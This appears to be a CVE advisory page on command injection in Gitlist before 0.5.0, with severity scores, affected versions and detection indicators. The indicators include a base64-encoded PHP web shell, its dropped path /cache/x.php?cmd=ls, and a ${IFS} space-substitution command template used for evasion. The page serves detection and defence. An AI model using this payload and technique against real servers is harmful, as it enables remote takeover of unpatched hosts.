cbcvebase.
CVE-2014-4511
published 2014-07-22

CVE-2014-4511: Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame…

PriorityP275high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
82.73%
99.6th percentile
Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.

Affected

4 ranges
VendorProductVersion rangeFixed in
gitlistgitlist<= 0.4.0
gitlistgitlist
gitlistgitlist
gitlistgitlist

Detection & IOCsextracted from sources · hover to see the quote

path/blame/master/
path/stats/master/
filenamex.php
url/cache/x.php?cmd=ls
otherPD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=
commandecho${IFS}<base64_payload>|base64${IFS}--decode
  • ·The exploit requires no authentication; there are no credentials or session tokens to filter on — detection must rely entirely on URI pattern matching.
  • ·The payload space is limited to 8192 bytes (max GET request length) and bad characters include '&' and space (0x20), so payloads use ${IFS} as a space substitute — detection should account for this evasion.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.